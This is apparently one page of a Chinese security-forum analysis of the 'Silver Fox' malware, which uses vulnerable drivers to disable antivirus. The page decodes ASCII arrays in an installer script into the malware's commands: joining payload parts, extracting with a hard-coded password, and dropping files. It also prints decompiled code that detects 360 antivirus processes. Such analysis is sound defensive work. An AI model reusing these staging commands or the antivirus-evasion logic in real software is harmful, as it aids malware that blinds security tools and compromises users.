首页| 论坛| 搜索| 消息
>〖系统安全〗
主题:持续演进的银狐——不断增加脆弱驱动通过BYOVD结束防病毒软件
z3960发表于 2026-02-21 07:49
9, 101, 110, 116, 115, 92, 109, 97, 105, 110, 46, 50, 34, 32, 34, 67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115, 92, 109, 97, 105, 110, 90, 84, 116, 82, 106, 84, 102, 121, 104, 78, 73, 68, 67, 65, 70, 46, 120, 109, 108, 34字符串:"/c copy /b /y "C:UsersPublicDocumentsmain.1" + "C:UsersPublicDocumentsmain.2" "C:UsersPublicDocumentsmainZTtRjTfyhNIDCAF.xml""
第三个数组(25字节)ASCII码:67, 58, 92, 85, 115, 101, 114, 115, 92, 80, 117, 98, 108, 105, 99, 92, 68, 111, 99, 117, 109, 101, 110, 116, 115字符串:"C:UsersPublicDocuments"
第四个数组(7字节)ASCII码:92, 109, 97, 105, 110, 46, 49字符串:"main.1"
第五个数组(7字节)ASCII码:92, 109, 97, 105, 110, 46, 50字符串:"main.2"
第六个数组(11字节)ASCII码:92, 102, 117, 110, 122, 105, 112, 46, 101, 120, 101字符串:"funzip.exe"
第七个数组(24字节)ASCII码:92, 109, 97, 105, 110, 90, 84, 116, 82, 106, 84, 102, 121, 104, 78, 73, 68, 67, 65, 70, 46, 120, 109, 108字符串:"mainZTtRjTfyhNIDCAF.xml"
第八个数组(10字节)ASCII码:104, 116, 76, 99, 69, 78, 121, 82, 70, 89字符串:"htLcENyRFY"
第九个数组(10字节)ASCII码:119, 88, 115, 72, 70, 110, 85, 110, 113, 75字符串:"wXsHFnUnqK"
第十个数组(7字节)ASCII码:120, 32, 45, 121, 32, 45, 112字符串:"x -y -p"
第十一个数组(4字节)ASCII码:32, 45, 111, 34字符串:" -o""
第十二个数组(3字节)ASCII码:34, 32, 34字符串:"" ""
第十三个数组(1字节)ASCII码:34字符串:"""
该函数依次执行以下功能:执行cmd.exe /c copy /b /y,将C:UsersPublicDocumentsmain.1和main.2合并为mainZTtRjTfyhNIDCAF.xml删除main.1和main.2文件检查funzip.exe和mainZTtRjTfyhNIDCAF.xml文件是否存在,如果存在则执行: funzip.exe x -y -p htLcENyRFYwXsHFnUnqK -o"C:UsersPublicDocuments" "C:UsersPublicDocumentsmainZTtRjTfyhNIDCAF.xml",解压mainZTtRjTfyhNIDCAF.xml文件删除mainZTtRjTfyhNIDCAF.xml文件
于是我们得到mainZTtRjTfyhNIDCAF.xml文件解压密码为"htLcENyRFYwXsHFnUnqK",解压后可得到: men.exe man100.dat Server.log.即释放men.exe man100.dat Server.log.其中,man100.dat是一个Zip压缩包,解压后可得到: temp_adjust.dat temp_filler.dat

2) "YQMBPLIVKAXLBBKHOYPB"函数

我们在该类汇编伪代码中,观察到一个可疑函数"YQMBPLIVKAXLBBKHOYPB",函数原文如下: 复制代码 隐藏代码.function(export) void YQMBPLIVKAXLBBKHOYPB()pushtype BOOLEAN ; StackCount = 1pushtype UnicodeString_2 ; StackCount = 2pushtype UnicodeString_2 ; StackCount = 3pushtype UnicodeString_2 ; StackCount = 4pushtype UnicodeString_2 ; StackCount = 5pushtype UnicodeString_2 ; StackCount = 6pushtype S32 ; StackCount = 7pushtype BOOLEAN ; StackCount = 8pushvar Var8 ; StackCount = 9call INITIALIZESETUPpop ; StackCount = 8pop ; StackCount = 7pushvar Var1 ; StackCount = 8call IS360PROCESSRUNNINGpop ; StackCount = 7pushtype BOOLEAN ; StackCount = 8assign Var8, Var1setz Var8sfz Var8pop ; StackCount = 7jf loc_263fpushtype BOOLEAN ; StackCount = 8pushtype Pointer ; StackCount = 9setptr Var9, Var7pushtype U8_4 ; StackCount = 10assign Var10, U8_4(1)pushtype S32 ; StackCount = 11assign Var11, S32(0)pushtype UnicodeString_2 ; StackCount = 12assign Var12, String_3("")pushtype UnicodeString_2 ; StackCount = 13pushtype WideString ; StackCount = 14pushtype UnicodeString_2 ; StackCount = 15pushtype Type30 ; StackCount = 16pushtype Type30 ; StackCount = 17pushtype S32 ; StackCount = 18assign Var18, S32(12)pushvar Var17 ; StackCount = 19call SETARRAYLENGTHpop ; StackCount = 18pop ; StackCount = 17assign Var17[0], S32(47)assign Var17[1], S32(99)assign Var17[2], S32(32)assign Var17[3], S32(99)assign Var17[4], S32(111)assign Var17[5], S32(112)assign Var17[6], S32(121)assign Var17[7], S32(32)assign Var17[8], S32(47)assign Var17[9], S32(98)assign Var17[10], S32(32)assign Var17[11], S32(34)assign Var16, Var17pop ; StackCount = 16pushvar Var15 ; StackCount = 17call STRFROMCODEpop ; StackCount = 16pop ; StackCount = 15assign Var14, Var15pop ; StackCount = 14pushtype UnicodeString_2 ; StackCount = 15pushtype Type30 ; StackCount = 16pushtype Type30 ; StackCount = 17pushtype S32 ; StackCount = 18assign Var18, S32(25)pushvar Var17 ; StackCount = 19call SETARRAYLENGTHpop ; StackCount = 18pop ; StackCount = 17assign Var17[0], S32(67)assign Var17[1], S32(58)assign Var17[2], S32(92)assign Var17[3], S32(85)assign Var17[4], S32(115)assign Var17[5], S32(101)assign Var17[6], S32(114)assign Var17[7], S32(115)assign Var17[8], S32(92)assign Var17[9], S32(80)assign Var17[10], S32(117)assign Var17[11], S32(98)assign Var17[12], S32(108)assign Var17[13], S32(105)assign Var17[14], S32(99)assign Var17[15], S32(92)assign Var17[16], S32(68)assign Var17[17], S32(111)assign Var17[18], S32(99)assign Var17[19], S32(117)assign Var17[20], S32(109)assign Var17[21], S32(101)assign Var17[22], S32(110)assign Var17[23], S32(116)assign Var17[24], S32(115)assign Var16, Var17pop ; StackCount = 16pushvar Var15 ; StackCount = 17call STRFROMCODEpop ; StackCount = 16pop ; StackCount = 15add Var14, Var15pop ; StackCount = 14pushtype UnicodeString_2 ; StackCount = 15pushtype Type30 ; StackCount = 16pushtype Type30 ; StackCount = 17pushtype S32 ; StackCount = 18assign Var18, S32(13)pushvar Var17 ; StackCount = 19call SETARRAYLENGTHpop ; StackCount = 18pop ; StackCount = 17assign Var17[0], S32(92)assign Var17[1], S32(117)assign Var17[2], S32(110)assign Var17[3], S32(122)assign Var17[4], S32(105)assign Var17[5], S32(112)assign Var17[6], S32(46)assign Var17[7], S32(51)assign Var17[8], S32(34)assign Var17[9], S32(32)assign Var17[10], S32(43)assign Var17[11], S32(32)assign Var17[12], S32(34)assign Var16, Var17pop ; StackCount = 16pushvar Var15 ; StackCount = 17call STRFROMCODEpop ; StackCount = 16pop ; StackCount = 15add Var14, Var15pop ; StackCount = 14pushtype UnicodeString_2 ; StackCount = 15pushtype Type30 ; StackCount = 16pushtype Ty
下一页上一页  (4/23)
回帖(7):
7 # hanxiao129
02-22 20:31
看来很不错的
6 # hanxiao129
02-22 20:30
不错的银狐
5 # hanxiao129
02-22 20:30
感谢楼主分享
4 # huwg
02-21 16:56
谢谢分享
3 # huwg
02-21 16:56
了解一下
2 # huwg
02-21 16:56
来看看看
1 # z3960
02-21 07:50
该函数会检测360主防进程——若存在,则执行断网,具体如下:该函数会调用代码中的“IS360PROCES ..

全部回帖(7)»
最新回帖
收藏本帖
发新帖